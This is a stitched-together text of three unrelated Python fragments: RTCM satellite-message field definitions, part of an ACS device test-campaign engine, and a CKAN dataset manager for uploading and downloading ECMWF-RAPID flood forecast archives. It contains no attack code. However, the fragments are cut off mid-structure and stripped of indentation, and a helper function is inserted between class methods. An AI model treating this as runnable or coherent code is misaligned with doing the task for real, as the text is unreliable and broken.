"DF071": "GPS Issue of data ephemeris (IODE)",
"DF242": "N0: Geometric gradient (North)",
"DF243": "E0: Geometric gradient (East)",
"DF244": "NI: Ionospheric gradient (North)",
"DF245": "EI: Ionospheric gradient (East)",
},
),
},
"1035": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF241": "GLONASS FKP Epoch Time",
"DF035": "No. of GLONASS Satellite Signals Processed",
"group": (
"DF035",
{
"DF038": "GLONASS Satellite ID",
"DF392": "GLONASS Issue Of Data (IOD)",
"DF242": "N0: Geometric gradient (North)",
"DF243": "E0: Geometric gradient (East)",
"DF244": "NI: Ionospheric gradient (North)",
"DF245": "EI: Ionospheric gradient (East)",
},
),
},
# "1036": {Not Used},
"1037": {
**HDR_1037_1039,
"group": (
"DF234",
{
"DF038": "GLONASS Satellite ID (Satellite Slot Number)",
"DF235": "GLONASS Ambiguity Status Flag",
"DF236": "GLONASS Non Sync Count",
"DF237": "GLONASS Ionospheric Carrier Phase Correction Difference",
},
),
},
"1038": {
**HDR_1037_1039,
"group": (
"DF234",
{
"DF038": "GLONASS Satellite ID (Satellite Slot Number)",
"DF235": "GLONASS Ambiguity Status Flag",
"DF236": "GLONASS Non Sync Count",
"DF238": "GLONASS Geometric Carrier Phase Correction Difference",
"DF239": "GLONASS IOD",
},
),
},
"1039": {
**HDR_1037_1039,
"group": (
"DF234",
{
"DF038": "GLONASS Satellite ID (Satellite Slot Number)",
"DF235": "GLONASS Ambiguity Status Flag",
"DF236": "GLONASS Non Sync Count",
"DF238": "GLONASS Geometric Carrier Phase Correction Difference",
"DF239": "GLONASS IOD",
"DF237": "GLONASS Ionospheric Carrier Phase Correction Difference",
},
),
},
"1041": {
"DF002": "Message Number",
"DF516": "NavIC/IRNSS Satellide ID",
"DF517": "Week Number (WN)",
"DF518": "Clock bias (af0)",
"DF519": "Clock drift (af1",
"DF520": "Clock drift rate (af2)",
"DF521": "SV Accuracy (URA)",
"DF522": "Time of clock (toc)",
"DF523": "Total Group Delay (TGD)",
"DF524": "Mean Motion Difference (∆n)",
"DF525": "Issue of Data Ephemeris & Clock (IODEC)",
"DF526": "Reserved bits after IODEC",
"DF527": "L5 Flag",
"DF528": "S Flag",
"DF529": "Cuc",
"DF530": "Cus",
"DF531": "Cic",
"DF532": "Cis",
"DF533": "Crc",
"DF534": "Crs",
"DF535": "Rate of Inclination angle (IDOT)",
"DF536": "Mean Anomaly (M0)",
"DF537": "Time of ephemeris (tOE)",
"DF538": "Eccentricity (e)",
"DF539": "Square root of Semi major axis (√A)",
"DF540": "Long of Ascending Node (Ω0)",
"DF541": "Argument of perigee (ω)",
"DF542": "Rate of RAAN (ΩDOT)",
"DF543": "Inclination (i0)",
"DF544": "2 spare bits after IDOT",
"DF545": "2 spare bits after i0",
},
"1042": {
"DF002": "Message Number",
"DF488": "BDS Satellite ID",
"DF489": "BDS Week Number",
"DF490": "BDS URAI",
"DF491": "BDS IDOT",
"DF492": "BDS AODE",
"DF493": "BDS Toc",
"DF494": "BDS a2",
"DF495": "BDS a1",
"DF496": "BSD a0",
"DF497": "BDS AODC",
"DF498": "BDS Crs",
"DF499": "BDS ∆n",
"DF500": "BDS M0",
"DF501": "BDS Cuc",
"DF502": "BDS e",
"DF503": "BDS Cus",
"DF504": "BDS A½",
"DF505": "BDS Toe",
"DF506": "BDS Cic",
"DF507": "BDS Ω0",
"DF508": "BDS Cis",
"DF509": "BDS i0",
"DF510": "BDS Crc",
"DF511": "BDS ω",
"DF512": "BDS ΩDOT",
"DF513": "BDS TGD1",
"DF514": "BDS TGD2",
"DF515": "BSD SV Health",
},
"1044": {
"DF002": "Message Number",
"DF429": "QZSS Satellite ID",
"DF430": "QZSS toc",
"DF431": "QZSS af2",
"DF432": "QZSS af1",
"DF433": "QZSS af0",
"DF434": "QZSS IODE",
"DF435": "QZSS Crs",
"DF436": "QZSS ∆n",
"DF437": "QZSS M0",
"DF438": "QZSS Cuc",
"DF439": "QZSS e",
"DF440": "QZSS Cus",
"DF441": "QZSS A½",
"DF442": "QZSS toe",
"DF443": "QZSS Cic",
"DF444": "QZSS Ω0",
"DF445": "QZSS Cis",
"DF446": "QZSS i0",
"DF447": "QZSS Crc",
"DF448": "QZSS ω",
"DF449": "QZSS Ω0n DOT",
"DF450": "QZSS i0-DOT",
"DF451": "QZSS Codes on L2 Channel",
"DF452": "QZSS Week Number",
"DF453": "QZSS URA",
"DF454": "QZSS SV health",
"DF455": "QZSS TGD",
"DF456": "QZSS IODC",
"DF457": "QZSS Fit Interval",
},
"1045": {
"DF002": "Message Number",
"DF252": "Galileo Satellite ID",
"DF289": "Galileo Week Number",
"DF290": "Galileo IODnav",
"DF291": "Galileo SV SISA",
"DF292": "Galileo Rate of Inclination (IDOT)",
"DF293": "Galileo toc",
"DF294": "Galileo af2",
"DF295": "Galileo af1",
"DF296": "Galileo af0",
"DF297": "Galileo Crs",
"DF298": "Galileo ∆n",
"DF299": "Galileo M0",
"DF300": "Galileo Cuc",
"DF301": "Galileo Eccentricity (e)",
"DF302": "Galileo Cus",
"DF303": "Galileo A½",
"DF304": "Galileo toe",
"DF305": "Galileo Cic",
"DF306": "Galileo Ω0",
"DF307": "Galileo Cis",
"DF308": "Galileo i0",
"DF309": "Galileo Crc",
"DF310": "Galileo ω",
"DF311": "Galileo ΩDOT",
"DF312": "Galileo BGD (E1/E5a)",
"DF314": "Galileo E5a Signal Health Status (OSHS)",
"DF315": "Galileo E5a Data Validity Status (OSDVS)",
"DF001_7": "Reserved",
},
"1046": {
"DF002": "Message Number",
"DF252": "Galileo Satellite ID",
"DF289": "Galileo Week Number",
"DF290": "Galileo IODnav",
"DF286": "Galileo SISA Index (E1,E5b)",
"DF292": "Galileo Rate of Inclination (IDOT)",
"DF293": "Galileo toc",
"DF294": "Galileo af2",
"DF295": "Galileo af1",
"DF296": "Galileo af0",
"DF297": "Galileo Crs",
"DF298": "Galileo ∆n",
"DF299": "Galileo M0",
"DF300": "Galileo Cuc",
"DF301": "Galileo Eccentricity (e)",
"DF302": "Galileo Cus",
"DF303": "Galileo A½",
"DF304": "Galileo toe",
"DF305": "Galileo Cic",
"DF306": "Galileo Ω0",
"DF307": "Galileo Cis",
"DF308": "Galileo i0",
"DF309": "Galileo Crc",
"DF310": "Galileo ω",
"DF311": "Galileo ΩDOT",
"DF312": "Galileo BGD (E1/E5a)",
"DF313": "Galileo BGD (E5b,E1)",
"DF316": "Galileo E5b Signal Health Status",
"DF317": "Galileo E5b Data Validity Status",
"DF287": "Galileo E1b Signal Health Status",
"DF288": "Galileo E1b Data Validity Status",
"DF001_2": "Reserved",
},
"1057": {
"DF002": "Message Number",
"DF385": "GPS Epoch Time 1s",
"DF391": "SSR Update Interval",
"DF388": "Multiple Message Indicator",
"DF375": "Satellite Reference Datum",
"DF413": "IOD SSR",
"DF414": "SSR Provider ID",
"DF415": "SSR Solution ID",
"DF387": "No. of Satellites",
"group": (
"DF387",
{
"DF068": "GPS Satellite ID",
"DF071": "GPS IODE",
"DF365": "Delta Radial",
"DF366": "Delta Along-Track",
"DF367": "Delta Cross-Track",
"DF368": "Dot Delta Radial",
"DF369": "Dot Delta Along-Track",
"DF370": "Dot Delta Cross-Track",
},
),
},
"1058": {
"DF002": "Message Number",
"DF385": "GPS Epoch Time 1s",
"DF391": "SSR Update Interval",
"DF388": "Multiple Message Indicator",
"DF413": "IOD SSR",
"DF414": "SSR Provider ID",
"DF415": "SSR Solution ID",
"DF387": "No. of Satellites",
"group": (
"DF387",
{
"DF068": "GPS Satellite ID",
"DF376": "Delta Clock C0",
"DF377": "Delta Clock C1",
"DF378": "Delta Clock C2",
},
),
},
"1059": {
"DF002": "Message Number",
"DF385": "GPS Epoch Time 1s",
"DF391": "SSR Update Interval",
"DF388": "Multiple Message Indicator",
"DF413": "IOD SSR",
"DF414": "SSR Provider ID",
"DF415": "SSR Solution ID",
"DF387": "No. of Satellites",
| |
device_parameters: List of device parameters to override default values in Device_Catalog.
:type device_parameters: list
:param flash_file_path: Flash file full path.
:type flash_file_path: str
:param random_mode: Enable random mode if your campaign is configured to run random TC.
:type random_mode: bool
:param user_email: Valid user email.
:type user_email: str
:param credentials: Credentials in User:Password format.
:type credentials: str
:rtype: bool
:return: True if setup is correctly done, else False
"""
status = None
device_name = kwargs["device_name"]
serial_number = kwargs["serial_number"]
campaign_name = kwargs["campaign_name"]
campaign_relative_path = kwargs["campaign_relative_path"]
device_parameters = kwargs["device_parameter_list"]
random_mode = kwargs["random_mode"]
user_email = kwargs["user_email"]
credentials = kwargs["credentials"]
log_level_param = kwargs["log_level"]
# In case the uuid is not set, generate it to ensure that the campaign has an id
# This id is used for reporting purpose
self.__logger.info('Checking metacampaign UUID integrity...')
metacampaign_uuid = kwargs["metacampaign_uuid"]
valid_uuid = is_uuid4(metacampaign_uuid)
if not valid_uuid:
self.__logger.warning("Metacampaign UUID is empty or not a valid UUID4; a new one is generated ...")
metacampaign_uuid = metacampaign_uuid if valid_uuid else str(uuid.uuid4())
self.__logger.info("Metacampaign UUID is {0}".format(metacampaign_uuid))
self.__init_configuration(**kwargs)
# Init Campaign report path
self.__init_report_path(campaign_name)
# Instantiate a live reporting interface
campaign_name = os.path.splitext(os.path.basename(campaign_name))[0]
self.__init_live_reporting(campaign_name,
metacampaign_uuid,
user_email,
kwargs.get("live_reporting_plugin"))
self.__stop_on_critical_failure = Util.str_to_bool(
self.__global_config.campaignConfig.get("stopCampaignOnCriticalFailure", "False"))
self.__stop_on_first_failure = Util.str_to_bool(
self.__global_config.campaignConfig.get("stopCampaignOnFirstFailure", "False"))
# Provide the global configuration for equipment manager and device manager
# They will use it to retrieve or set values in it.
EquipmentManager().set_global_config(self.__global_config)
DeviceManager().set_global_config(self.__global_config)
# Initialize equipments necessary to control DUT (io card, power supply, usb hub)
EquipmentManager().initialize()
# Read serial number if given as ACS command line
if serial_number not in ["", None]:
# Priority to serialNumber from --sr parameter
device_parameters.append("serialNumber=%s" % str(serial_number))
# Load the device
device = DeviceManager().load(device_name, device_parameters)[Util.AcsConstants.DEFAULT_DEVICE_NAME]
# store the device config file
device_conf_list = []
for dev in DeviceManager().get_all_devices():
device_config_file = dev.get_config("DeviceConfigPath")
if device_config_file:
device_conf_list.append(device_config_file)
self._campaign_elements.update({"devices": device_conf_list})
# Init the logger
self.__init_logger(device.hw_variant_name, serial_number, self.campaign_report_path, metacampaign_uuid)
self.__logger.info('Checking acs version : %s' % str(Util.get_acs_release_version()))
if self.__test_case_conf_list:
if random_mode:
self.__test_case_conf_list = self.__randomize_test_cases(self.__test_case_conf_list)
# Parse parameter catalog
parameter_catalog_parser = ParameterCatalogParser()
self.__global_config.__setattr__("parameterConfig", parameter_catalog_parser.parse_catalog_folder())
# Retrieve MTBF custom parameter to align logging level between the console and the log file
is_logging_level_aligned = Util.str_to_bool(
self.__global_config.campaignConfig.get("isLoggingLevelAligned", "False"))
# Set log level according to global_config file content
if log_level_param:
logging_level = log_level_param
else:
logging_level = self.__global_config.campaignConfig.get("loggingLevel", "DEBUG")
ACSLogging.set_log_level(logging_level, is_logging_level_aligned)
# Set campaign_type when it exists
campaign_type = self.__global_config.campaignConfig.get("CampaignType")
# Set credentials
self.__global_config.__setattr__("credentials", credentials)
# Init reports
self.__init_reports(self.campaign_report_path,
device_name, campaign_name, campaign_relative_path,
campaign_type, user_email, metacampaign_uuid)
# Creates Test case Manager object
self.__test_case_manager = TestCaseManager(self.__test_report,
live_reporting_interface=self._live_reporting_interface)
# Setup Test Case Manager
tcm_stop_execution = self.__test_case_manager.setup(self.__global_config,
self.__debug_report,
self.__test_case_conf_list[0].do_device_connection)
status = tcm_stop_execution
else:
status = AcsBaseException.NO_TEST
return status
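# ---------------------------------------------------------------------------
# is_uuid4() used above is imported from an ACS utility module not shown here;
# a minimal stand-in with the behaviour the call site relies on (True only for
# a string that parses as a version-4 UUID) might look like the sketch below.
# The helper name is hypothetical.
def is_uuid4_sketch(value):
    """Return True if value parses as a version-4 UUID, else False."""
    try:
        return uuid.UUID(str(value)).version == 4
    except (ValueError, AttributeError, TypeError):
        return False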
def _send_create_testcase_info(self, execution_request_nb):
"""
This function aims at creating all test cases reporting data
at beginning of campaign so that max information is available
as soon as possible
:param execution_request_nb: nb of times to execute the campaign
:type execution_request_nb: integer
"""
tc_order = 1
for execution_iteration in range(execution_request_nb):
for tc_index, tc_conf in enumerate(self.__test_case_conf_list):
uc_name = tc_conf.get_ucase_name()
tc_name = tc_conf.get_name()
tc_phase = tc_conf.get_phase()
tc_type = tc_conf.get_type()
tc_domain = tc_conf.get_domain()
is_warning = tc_conf.get_is_warning()
tc_parameters = tc_conf.get_params().get_params_as_dict()
self._live_reporting_interface.send_create_tc_info(tc_name,
uc_name,
tc_phase,
tc_type,
tc_domain,
tc_order,
is_warning,
tc_parameters)
tc_order += 1
# Only MAX_TC_NB_AUTHORIZED will be scheduled and executed by ACS
if tc_order > MAX_TC_NB_AUTHORIZED:
break
else:
continue
break
def execute(self, is_arg_checking=True, **kwargs):
"""
This function is the entry point of ACS solution when called by Test Runner.
It parses the arguments given to CampaignEngine,
parses XML files associated & read the campaign content
for the TestCaseManager to execute.
:param is_arg_checking: Whether or not ACS arguments are checked
:type is_arg_checking: bool
:param kwargs: ACS arguments
:type kwargs: dict
"""
error = None
global_results = Util.ACSResult(verdict=Util.ExitCode.FAILURE)
execution_iteration = 1
# Index of test case inside loop on campaign
tc_order = 1
stop_execution = False
verdicts = {}
acs_outcome_verdicts = {}
acs_outcome_status = False
self.__campaign_metrics.campaign_start_datetime = datetime.now()
try:
arg_checker = ArgChecker(**kwargs)
if is_arg_checking:
error = arg_checker.check_args(False)
if error:
raise AcsBaseException("INVALID_PARAMETER", error)
params = arg_checker.args
campaign_name = params["campaign_name"]
params["campaign_relative_path"] = os.path.dirname(campaign_name)
execution_request_nb = params["execution_request_nb"]
random_mode = params["random_mode"]
device_parameters = params["device_parameter_list"]
Paths.FLASH_FILES = params["flash_file_path"]
# Log acs param
self.__log_acs_param(params)
# Check if device parameters is a list
if not isinstance(device_parameters, list):
device_parameters = []
# Set test campaign status : campaign is in setup phase
global_results.status = Util.Status.INIT
setup_status = self._setup(**params)
# setup successfully completed
if setup_status is None:
total_tc_to_execute = execution_request_nb * len(self.__test_case_conf_list)
if total_tc_to_execute > MAX_TC_NB_AUTHORIZED:
self.__logger.warning("Total number of TCs ({0}) exceeds maximum number authorized ({1})."
.format(total_tc_to_execute, MAX_TC_NB_AUTHORIZED))
self.__logger.warning("Only first {0} TCs will be executed".format(MAX_TC_NB_AUTHORIZED))
total_tc_to_execute = MAX_TC_NB_AUTHORIZED
self.__campaign_metrics.total_tc_count = total_tc_to_execute
# Send live report if enabled
self._send_create_testcase_info(execution_request_nb)
# Log extra acs param for metrics
self._log_acs_param_extra(params)
# Execute test cases of campaign
# Set test campaign status : campaign is starting
global_results.status = Util.Status.ONGOING
while execution_iteration <= execution_request_nb and not stop_execution:
stop_execution, tc_order = self._execute_test_cases(verdicts, tc_order, acs_outcome_verdicts)
execution_iteration += 1
if random_mode:
self.__test_case_conf_list = self.__randomize_test_cases(self.__test_case_conf_list)
if tc_order > MAX_TC_NB_AUTHORIZED:
break
if not stop_execution:
LOGGER_FWK_STATS.info("event=STOP_ON_EOC")
# Set test campaign status : campaign is completed
global_results.status = Util.Status.COMPLETED
else:
# Set test campaign status : campaign has been interrupted during test suite execution
global_results.status = Util.Status.ABORTED
# Exception occurred during setup
else:
self.__log_stop_campaign(setup_status)
# Set test campaign status
global_results.status = Util.Status.ABORTED
(status, acs_outcome_status) = self._all_tests_succeed(verdicts, acs_outcome_verdicts)
if status:
global_results.verdict = Util.ExitCode.SUCCESS
except (KeyboardInterrupt):
LOGGER_FWK_STATS.info("event=STOP_ON_USER_INTERRUPT")
self.__log_stop_campaign("USER INTERRUPTION")
# Set test campaign status
global_results.status = Util.Status.ABORTED
except (SystemExit):
LOGGER_FWK_STATS.info("event=STOP_ON_SYSTEM INTERRUPT")
self.__log_stop_campaign("SYSTEM INTERRUPTION")
# Set test campaign status
global_results.status = Util.Status.ABORTED
except Exception as exception:
if isinstance(exception, AcsBaseException):
error = str(exception)
LOGGER_FWK_STATS.info("event=STOP_ON_EXCEPTION; error={0}".format(error))
if self.__logger is not None:
self.__logger.error(error)
else:
print(error)
else:
ex_code, ex_msg, ex_tb = Util.get_exception_info(exception)
LOGGER_FWK_STATS.info("event=STOP_ON_EXCEPTION; error={0}".format(ex_msg))
if self.__logger is not None:
self.__logger.error(ex_msg)
self.__logger.debug("Traceback: {0}".format(ex_tb))
self.__logger.debug("return code is {0}".format(ex_code))
else:
print (ex_msg)
print ("Traceback: {0}".format(ex_tb))
print ("return code is {0}".format(ex_code))
# add an explicit message in the last executed TC's comment
if self.__test_report is not None:
self.__test_report.add_comment(tc_order, str(exception))
self.__test_report.add_comment(tc_order,
("Fatal exception : Test Campaign will be stopped. "
"See log file for more information."))
# Set test campaign status
global_results.status = Util.Status.ABORTED
finally:
# Sending Campaign Stop info to remote server (for Live Reporting control)
self._live_reporting_interface.send_stop_campaign_info(verdict=global_results.verdict,
status=global_results.status)
if self.__test_case_manager is not None:
campaign_error = bool(global_results.verdict)
try:
cleanup_status, global_results.dut_state = self.__test_case_manager.cleanup(campaign_error)
except AcsBaseException as e:
cleanup_status = False
global_results.dut_state = Util.DeviceState.UNKNOWN
error = str(e)
if self.__logger is not None:
if error:
self.__logger.error(error)
self.__logger.info("FINAL DEVICE STATE : %s" % (global_results.dut_state,))
else:
if error:
print error
print ("FINAL DEVICE STATE : %s" % (global_results.dut_state,))
else:
cleanup_status = True
if not cleanup_status:
global_results.verdict = Util.ExitCode.FAILURE
for verdict in verdicts:
if not Util.Verdict.is_pass(verdicts[verdict]):
tc_name = str(verdict).split(self.VERDICT_SEPARATOR)[0]
tc_verdict = verdicts[verdict]
msg = "ISSUE: %s=%s\n" % (tc_name, tc_verdict)
sys.stderr.write(msg)
# Wait for last LiveReporting action requests
self._live_reporting_interface.wait_for_finish()
if self.__test_report:
# write data in report files
self.__write_report_info()
# update the metacampaign result id in xml report file
# this action is done at the end because the connection retry with the live reporting server is done
# throughout campaign execution
self.__test_report.write_metacampaign_result_id(self._live_reporting_interface.campaign_id)
if self.campaign_report_path is not None:
# Archive test campaign XML report
self.__logger.info("Archive test campaign report...")
# Compute checksum
_, archive_file = zip_folder(self.campaign_report_path, self.campaign_report_path)
self._live_reporting_interface.send_campaign_resource(archive_file)
# Display campaign metrics information to the user
self._display_campaign_metrics(self.__campaign_metrics)
# Close logger
ACSLogging.close()
if acs_outcome_status and cleanup_status:
global_results.verdict = Util.ExitCode.SUCCESS
else:
global_results.verdict = Util.ExitCode.FAILURE
return global_results
def campaign_metrics(self):
"""
Provide Campaign metrics
:return: CampaignMetrics
"""
return self.__campaign_metrics
def _execute_test_cases(self, verdicts, tc_order, acs_outcome_verdicts):
"""
Execute test cases of current campaign and update verdicts for current campaign iteration
:param verdicts: dictionary of verdicts of all campaign iterations
:param tc_order: index of the test in the whole campaign iterations
:param acs_outcome_verdicts: dictionary of verdicts which takes into account whether the TC is_warning
:return: stop_execution, tc_order
"""
# Flag to stop campaign
stop_execution = False
# Index in current campaign execution
tc_index = 0
# Verdict of the current test case being executed
verdict = None
# Current TestCaseConf object
tcase_conf = None
# Run all Test Cases
while tc_index < len(self.__test_case_conf_list):
tcase_conf = self.__test_case_conf_list[tc_index]
if | |
#!/usr/bin/env python
import datetime
from glob import glob
import os
import re
from requests import get
from shutil import rmtree
import tarfile
import zipfile
from tethys_dataset_services.engines import CkanDatasetEngine
#------------------------------------------------------------------------------
#Main Dataset Manager Class
#------------------------------------------------------------------------------
class CKANDatasetManager(object):
"""
This class is used to find, zip and upload files to a CKAN data server
Note: this does not delete the original files
"""
def __init__(self, engine_url, api_key, model_name,
dataset_notes="CKAN Dataset",
resource_description="CKAN Resource",
date_format_string="%Y%m%d"):
if engine_url.endswith('/'):
engine_url = engine_url[:-1]
if not engine_url.endswith('api/action') and not engine_url.endswith('api/3/action'):
engine_url += '/api/action'
self.dataset_engine = CkanDatasetEngine(endpoint=engine_url, apikey=api_key)
self.model_name = model_name
self.dataset_notes = dataset_notes
self.resource_description = resource_description
self.date_format_string = date_format_string
def initialize_run(self, watershed, subbasin, date_string):
"""
Initialize run for watershed upload/download
"""
self.watershed = watershed.lower()
self.subbasin = subbasin.lower()
self.date_string = date_string
self.date = datetime.datetime.strptime(self.date_string, self.date_format_string)
self.dataset_name = '%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date.strftime("%Y%m%d"))
self.resource_name = '%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date_string)
def make_tarfile(self, file_path):
"""
This function packages the dataset into a tar.gz file and
returns the path
"""
base_path = os.path.dirname(file_path)
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
with tarfile.open(output_tar_file, "w:gz") as tar:
tar.add(file_path, arcname=os.path.basename(file_path))
return output_tar_file
def make_directory_tarfile(self, directory_path, search_string="*"):
"""
This function packages all of the datasets into a tar.gz file and
returns the path
"""
base_path = os.path.dirname(directory_path)
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
directory_files = glob(os.path.join(directory_path,search_string))
with tarfile.open(output_tar_file, "w:gz") as tar:
for directory_file in directory_files:
tar.add(directory_file, arcname=os.path.basename(directory_file))
return output_tar_file
def get_dataset_id(self):
"""
This function gets the id of a dataset
"""
# Use the json module to load CKAN's response into a dictionary.
response_dict = self.dataset_engine.search_datasets({ 'name': self.dataset_name })
if response_dict['success']:
if int(response_dict['result']['count']) > 0:
return response_dict['result']['results'][0]['id']
return None
else:
return None
def create_dataset(self):
"""
This function creates a dataset if it does not exist
"""
dataset_id = self.get_dataset_id()
#check if dataset exists
if not dataset_id:
#if it does not exist, create the dataset
result = self.dataset_engine.create_dataset(name=self.dataset_name,
notes=self.dataset_notes,
version='1.0',
tethys_app='erfp_tool',
                                                        watershed=self.watershed,
subbasin=self.subbasin,
month=self.date.month,
year=self.date.year)
dataset_id = result['result']['id']
return dataset_id
def upload_resource(self, file_path, overwrite=False, file_format='tar.gz'):
"""
This function uploads a resource to a dataset if it does not exist
"""
#create dataset for each watershed-subbasin combo if needed
dataset_id = self.create_dataset()
if dataset_id:
            #check if the resource already exists
            resource_results = self.dataset_engine.search_resources({'name': self.resource_name},
                                                                    dataset_id=dataset_id)
try:
#determine if results are exact or similar
same_ckan_resource_id = ""
if resource_results['result']['count'] > 0:
for resource in resource_results['result']['results']:
if resource['name'] == self.resource_name:
same_ckan_resource_id = resource['id']
break
if overwrite and same_ckan_resource_id:
#delete resource
"""
                    CKAN API CURRENTLY DOES NOT WORK FOR UPDATE - bug: it asks for a file or a url,
                    but requires both to be supplied while only one may actually be set ...
#update existing resource
print resource_results['result']['results'][0]
update_results = self.dataset_engine.update_resource(resource_results['result']['results'][0]['id'],
file=file_to_upload,
url="",
date_uploaded=datetime.datetime.utcnow().strftime("%Y%m%d%H%M"))
"""
self.dataset_engine.delete_resource(same_ckan_resource_id)
if not same_ckan_resource_id or overwrite:
#upload resources to the dataset
return self.dataset_engine.create_resource(dataset_id,
name=self.resource_name,
file=file_path,
format=file_format,
tethys_app="erfp_tool",
watershed=self.watershed,
subbasin=self.subbasin,
forecast_date=self.date_string,
description=self.resource_description)
else:
print "Resource", self.resource_name ,"exists. Skipping ..."
except Exception,e:
print e
pass
def zip_upload_file(self, file_path):
"""
This function uploads a resource to a dataset if it does not exist
"""
#zip file and get dataset information
print "Zipping files for watershed: %s %s" % (self.watershed, self.subbasin)
tar_file_path = self.make_tarfile(file_path)
print "Finished zipping files"
print "Uploading datasets"
resource_info = self.upload_resource(tar_file_path)
os.remove(tar_file_path)
print "Finished uploading datasets"
return resource_info
def zip_upload_directory(self, directory_path, search_string="*", overwrite=False):
"""
This function uploads a resource to a dataset if it does not exist
"""
#zip file and get dataset information
print "Zipping files for watershed: %s %s" % (self.watershed, self.subbasin)
tar_file_path = self.make_directory_tarfile(directory_path, search_string)
print "Finished zipping files"
print "Uploading datasets"
resource_info = self.upload_resource(tar_file_path, overwrite)
os.remove(tar_file_path)
print "Finished uploading datasets"
return resource_info
def get_resource_info(self):
"""
This function gets the info of a resource
"""
dataset_id = self.get_dataset_id()
if dataset_id:
            #search for the resource in the dataset
            resource_results = self.dataset_engine.search_resources({'name': self.resource_name},
                                                                    dataset_id=dataset_id)
try:
if resource_results['result']['count'] > 0:
for resource in resource_results['result']['results']:
if resource['name'] == self.resource_name:
                            #return the matching resource
return resource
except Exception,e:
print e
pass
return None
def get_dataset_info(self):
"""
        This function gets the info of a dataset
"""
# Use the json module to load CKAN's response into a dictionary.
response_dict = self.dataset_engine.search_datasets({ 'name': self.dataset_name })
if response_dict['success']:
if int(response_dict['result']['count']) > 0:
for dataset in response_dict['result']['results']:
if dataset['name'] == self.dataset_name:
                        #return the matching dataset
return dataset
return None
else:
return None
def download_resource_from_info(self, extract_directory, resource_info_array, local_file=None):
"""
Downloads a resource from url
"""
data_downloaded = False
#only download if file does not exist already
check_location = extract_directory
if local_file:
check_location = os.path.join(extract_directory, local_file)
if not os.path.exists(check_location):
print "Downloading and extracting files for watershed:", self.watershed, self.subbasin
try:
os.makedirs(extract_directory)
except OSError:
pass
for resource_info in resource_info_array:
#for resource
file_format = resource_info['format']
local_tar_file = "%s.%s" % (resource_info['name'], file_format)
local_tar_file_path = os.path.join(extract_directory,
local_tar_file)
                if os.path.exists(local_tar_file_path):
                    print "Local raw file found. Skipping download ..."
                else:
                    try:
                        r = get(resource_info['url'], stream=True)
                        with open(local_tar_file_path, 'wb') as f:
                            for chunk in r.iter_content(chunk_size=1024):
                                if chunk: # filter out keep-alive new chunks
                                    f.write(chunk)
                                    f.flush()
                        data_downloaded = True
                    except Exception, ex:
                        print ex
                        data_downloaded = False
                try:
                    if file_format.lower() == "tar.gz":
                        with tarfile.open(local_tar_file_path) as tar:
                            tar.extractall(extract_directory)
                    elif file_format.lower() == "zip":
                        with zipfile.ZipFile(local_tar_file_path) as zip_file:
                            zip_file.extractall(extract_directory)
                    else:
                        print "Unsupported file format. Skipping ..."
                except Exception, ex:
                    print ex
                    data_downloaded = False
try:
os.remove(local_tar_file_path)
except OSError:
pass
print "Finished downloading and extracting file(s)"
return data_downloaded
else:
print "Resource exists locally. Skipping ..."
return False
def download_resource(self, extract_directory, local_file=None):
"""
This function downloads a resource
"""
resource_info = self.get_resource_info()
if resource_info:
return self.download_resource_from_info(extract_directory,
[resource_info],
local_file)
else:
print "Resource not found in CKAN. Skipping ..."
return False
def download_prediction_resource(self, watershed, subbasin, date_string, extract_directory):
"""
This function downloads a prediction resource
"""
self.initialize_run(watershed, subbasin, date_string)
self.download_resource(extract_directory)
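#------------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). The endpoint
# URL, API key, watershed/subbasin names and file paths below are placeholders.
#------------------------------------------------------------------------------
def _example_ckan_upload_workflow():
    """Minimal sketch of the zip-and-upload workflow of CKANDatasetManager."""
    manager = CKANDatasetManager('http://ckan.example.com/api/action',
                                 'my-api-key',
                                 'erfp')
    # set the watershed/subbasin/date context; this builds the dataset and
    # resource names used by all upload/download helpers
    manager.initialize_run('magdalena', 'el_banco', '20080601')
    # tar.gz a single file and upload it as a resource (the original is kept)
    manager.zip_upload_file('/path/to/Qout_el_banco_52.nc')
    # later, pull the resource back down and extract it
    manager.download_resource('/path/to/extract_dir')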
#------------------------------------------------------------------------------
#ECMWF RAPID Dataset Manager Class
#------------------------------------------------------------------------------
class ECMWFRAPIDDatasetManager(CKANDatasetManager):
"""
This class is used to find and download, zip and upload ECMWFRAPID
prediction files from/to a data server
"""
def __init__(self, engine_url, api_key):
super(ECMWFRAPIDDatasetManager, self).__init__(engine_url,
api_key,
'erfp',
"ECMWF-RAPID Flood Predicition Dataset",
'This dataset contians NetCDF3 files produced by '
'downscalsing ECMWF forecasts and routing them with RAPID',
"%Y%m%d.%H"
)
def initialize_run_ecmwf(self, watershed, subbasin, date_string):
"""
Initialize run for watershed upload/download custom for ecmwf
"""
self.watershed = watershed.lower()
self.subbasin = subbasin.lower()
self.date_string = date_string[:11]
self.date = datetime.datetime.strptime(self.date_string, self.date_format_string)
self.dataset_name = '%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date.strftime("%Y%m%dt%H"))
def update_resource_ensemble_number(self, ensemble_number):
"""
Set ensemble number in resource name for ecmwf resource
"""
self.resource_name = '%s-%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date_string,
ensemble_number)
def update_resource_return_period(self, return_period):
"""
        Set the return period in the resource name for an ecmwf warning points resource
"""
self.resource_name = '%s-%s-%s-%s-warning_points_%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date_string,
return_period)
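    # Naming note (illustrative values): with model_name 'erfp', watershed
    # 'magdalena', subbasin 'el_banco' and date_string '20080601.00',
    # update_resource_ensemble_number(52) sets
    #   resource_name = 'erfp-magdalena-el_banco-20080601.00-52'
    # while update_resource_return_period(20) sets
    #   resource_name = 'erfp-magdalena-el_banco-20080601.00-warning_points_20'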
def get_subbasin_name_list(self, source_directory, subbasin_name_search):
"""
Get a list of subbasins in directory
"""
subbasin_list = []
outflow_files = sorted(glob(os.path.join(source_directory,'Qout_*.nc')))
for outflow_file in outflow_files:
subbasin_name = subbasin_name_search.search(os.path.basename(outflow_file)).group(1)
if subbasin_name not in subbasin_list:
subbasin_list.append(subbasin_name)
return subbasin_list
def zip_upload_warning_points_in_directory(self, directory_path, search_string="return_*_points.txt"):
"""
